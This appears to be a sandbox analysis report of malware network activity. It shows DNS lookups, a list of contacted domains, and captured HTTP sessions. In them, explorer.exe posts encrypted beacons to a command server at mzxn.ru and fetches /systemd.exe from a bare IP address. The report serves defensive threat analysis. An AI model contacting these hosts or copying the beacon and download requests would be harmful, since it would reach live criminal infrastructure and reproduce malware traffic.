Jul 27, 2024 07:32:33.646526098 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		102.189.6.13	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646526098 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646526098 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		186.182.55.44	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646526098 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		190.147.2.86	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:33:11.480741978 CEST	1.1.1.1	192.168.2.5	0xf203	No error (0)	liernessfornicsa.shop		172.67.213.85	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:33:11.480741978 CEST	1.1.1.1	192.168.2.5	0xf203	No error (0)	liernessfornicsa.shop		104.21.77.246	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mussangroup.com

167.235.128.153

107.173.160.137

107.173.160.139

funrecipebooks.com

callosallsaospz.shop

rentry.co

store4.gofile.io

nfdfhrsebwtpak.org

mzxn.ru

nbjnvxjkhmqxikmf.com

aqikanflflrl.com

xulyufyklyfdh.net

foijjivakijcspuj.com

nbeolaysbixye.org

lodrwjryqookcn.org

fbsckrfixku.org

77.221.157.163

uafdxvcfkgfo.org

rbkrqeaeqwvdi.net

gbvtererkqfobu.net

icugirctwrbhpuq.net

qnovtwajiclq.net

64.190.113.113

qrsqtwgtiasbuo.com

qgdbhmlcsptqb.org

ohroqjqgvdh.com

swfkahecbiykwi.org

fbuadeoajebihl.org

lsufwulnegxqsvy.net

bluhmqewincunud.org

frvkldaekrdbt.net

mqumylcqnaa.org

wvcpcwinaogm.org

109.172.114.212

qtgvwwvtuns.org

nrlmldyquiidbru.org

iidaiysfdtd.com

ggwxsequudqgaxcf.org

sqxnnumhnssm.org

ctqgxbikusofytgf.net

dbybeunkxlc.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	186.145.236.93	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:29:27.463159084 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nfdfhrsebwtpak.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 346 Host: mzxn.ru
Jul 27, 2024 07:29:27.463159084 CEST	346	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 75 14 a0 90 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA .[k,vuub$Nwc+Z1& 1MG1zK^],+A{/?WCN3RGMI?tdFUXSTnQd<-Lk,C6
Jul 27, 2024 07:29:28.577542067 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:29:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	186.145.236.93	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:29:28.587882042 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nbjnvxjkhmqxikmf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 270 Host: mzxn.ru
Jul 27, 2024 07:29:28.590007067 CEST	270	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 7c 08 ed 9f Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vu\|HSxD d}1p0!==1VJ\I5+Y#P5)fR.VhH!mY;x/O"h{EM>fWRq_E
Jul 27, 2024 07:29:29.866514921 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:29:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	186.145.236.93	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:29:29.875504971 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aqikanflflrl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: mzxn.ru
Jul 27, 2024 07:29:29.875504971 CEST	151	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 24 00 af e6 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vu$f6@p{U:Dm\|0-unPF{@=5="?%iq4Y
Jul 27, 2024 07:29:30.949317932 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:29:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49712	186.145.236.93	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:29:30.957902908 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xulyufyklyfdh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: mzxn.ru
Jul 27, 2024 07:29:30.957902908 CEST	271	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 56 20 b2 bf Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vuV xWbmmP01EMr{vu?6haIOYL-YIYnRBO+\|Wt}D;/@TPrvAs~,
Jul 27, 2024 07:29:32.017740011 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:29:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49713	186.145.236.93	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:29:32.031155109 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://foijjivakijcspuj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 115 Host: mzxn.ru
Jul 27, 2024 07:29:32.031188965 CEST	115	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 41 0f a4 85 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vuAKM]Bdkn.\|\|*5/
Jul 27, 2024 07:29:33.075118065 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:29:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49714	186.145.236.93	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:29:33.083550930 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nbeolaysbixye.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 197 Host: mzxn.ru
Jul 27, 2024 07:29:33.083586931 CEST	197	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 51 1d d4 fd Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vuQ&Jg6O4v/BG1{)<'GaM;6CxV@4m#4OJzYWMl
Jul 27, 2024 07:29:34.113929033 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:29:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49715	186.145.236.93	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:29:34.125047922 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lodrwjryqookcn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 159 Host: mzxn.ru
Jul 27, 2024 07:29:34.125047922 CEST	159	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 64 0c c1 f2 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vud[]fTla <rsi@{a<XME\|N(L
Jul 27, 2024 07:29:35.166555882 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:29:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	51797	186.145.236.93	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:29:35.183665037 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fbsckrfixku.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: mzxn.ru
Jul 27, 2024 07:29:35.183665991 CEST	150	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 6e 5e f8 f8 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vun^e**SL03cnS#.?^y?!G,}Fv
Jul 27, 2024 07:29:36.305227995 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:29:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	51799	77.221.157.163	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:29:36.313940048 CEST	163	OUT	GET /systemd.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 77.221.157.163

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	51803	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:00.327934027 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uafdxvcfkgfo.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: mzxn.ru
Jul 27, 2024 07:30:00.328027964 CEST	150	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 70 0a e2 ad Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vupI,oKGBr[;oGE"CUBS&'v
Jul 27, 2024 07:30:01.839700937 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	51804	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:01.854171991 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rbkrqeaeqwvdi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: mzxn.ru
